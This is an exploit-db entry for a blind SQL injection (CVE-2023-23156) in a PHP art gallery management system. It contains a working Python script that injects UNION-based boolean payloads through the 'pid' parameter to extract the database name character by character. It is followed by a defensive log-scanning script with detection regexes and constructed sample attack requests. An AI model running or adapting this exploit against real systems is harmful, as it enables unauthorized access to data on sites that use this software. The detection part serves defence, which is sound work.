Art Gallery Management System Project in PHP v 1.0 – SQL injection

  • Author: Yogesh Verma
    Date: 2023-04-06
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51272/
  • # Exploit Title: Art Gallery Management System Project in PHP v 1.0 - SQL injection
    # Date: 31-01-2023
    # Exploit Author: Yogesh Verma
    # Vendor Homepage: https://y0gesh-verma.github.io/
    # Software Link: https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/, https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
    # Version: 1.0
    # Tested on: Windows/Linux
    # CVE : CVE-2023-23156
    
    
    
    #!/usr/bin/python
    import sys
    import requests
    
    tmp = requests.Session()
    db_name = ""
    database = ""
    if len(sys.argv) == 2:
        url = sys.argv[1]
        # Boolean-based blind check: compare each of the first 6 characters of
        # database() against the ASCII codes 32..125 through the 'pid' parameter.
        for i in range(1, 7):
            for j in range(32, 126):
                sql_payload = f"'UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,(select*from(select (ascii(substr(database(),{i},1))={j}))a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL'"
                data = {'pid': '-1' + sql_payload}
                r = tmp.get(url, params=data)
                # A response containing "Dimension : 1" means the comparison was true.
                if "Dimension : 1" in r.text:
                    db_name += chr(j)
        database += db_name
        if len(db_name)>1:
            print('\n'+"Fetching current database :")
            print(database)
            print('\n'+"vulnerable to CVE-2023-23156")
        else:
            print("Not vulnerable to CVE-2023-23156")
    else:
        print("Error: Please provide the URL as an argument.")
        print("Example: script.py https://example.com/single-product.php")
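
A defender-side check for the request pattern the script above generates, added here as an example and not part of the original exploit-db entry: it scans web access logs for `pid` values on `single-product.php` that are not plain integers and records which character positions were probed. The combined log format, the client IP addresses and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, quote_plus

# Boolean test used by the script above: ascii(substr(database(),<pos>,1))=<code>
PROBE_RE = re.compile(
    r"ascii\s*\(\s*substr\s*\(\s*database\s*\(\s*\)\s*,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*=\s*(\d+)", re.I)
# Assumed combined log format: client IP first, request line in the first quoted field
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify_pid(pid):
    """'ok' for a plain integer id, 'blind-probe' for the pattern above, else 'suspicious'."""
    if re.fullmatch(r"\d+", pid):
        return "ok"
    return "blind-probe" if PROBE_RE.search(pid) else "suspicious"

def scan(log_lines, path="/single-product.php"):
    """Group non-integer pid requests by client IP and collect the positions probed."""
    report = defaultdict(lambda: {"requests": 0, "positions": set()})
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith(path):
            continue
        for pid in parse_qs(parts.query).get("pid", []):  # parse_qs URL-decodes the value
            if classify_pid(pid) == "ok":
                continue
            report[ip]["requests"] += 1
            hit = PROBE_RE.search(pid)
            if hit:
                report[ip]["positions"].add(int(hit.group(1)))
    return dict(report)

def _line(ip, pid):  # builds one constructed access-log line
    return (f'{ip} - - [06/Apr/2023:10:00:00 +0000] '
            f'"GET /single-product.php?pid={quote_plus(pid)} HTTP/1.1" 200 512')

# Constructed sample log (documentation-range IPs), not captured traffic
SAMPLE = [_line("198.51.100.7", "12")]
SAMPLE += [_line("203.0.113.9", f"-1'UNION SELECT NULL,(select*from(select "
                 f"(ascii(substr(database(),{i},1))={j}))a),NULL'")
           for i in (1, 2) for j in (97, 98, 99)]
SAMPLE.append(_line("198.51.100.7", "12 OR 1=1"))

if __name__ == "__main__":
    for ip, info in scan(SAMPLE).items():
        print(ip, info["requests"], sorted(info["positions"]))
```

A client that sweeps several positions in a short window is enumerating a value character by character; any non-integer `pid` at all is worth alerting on, since the parameter is a numeric product id.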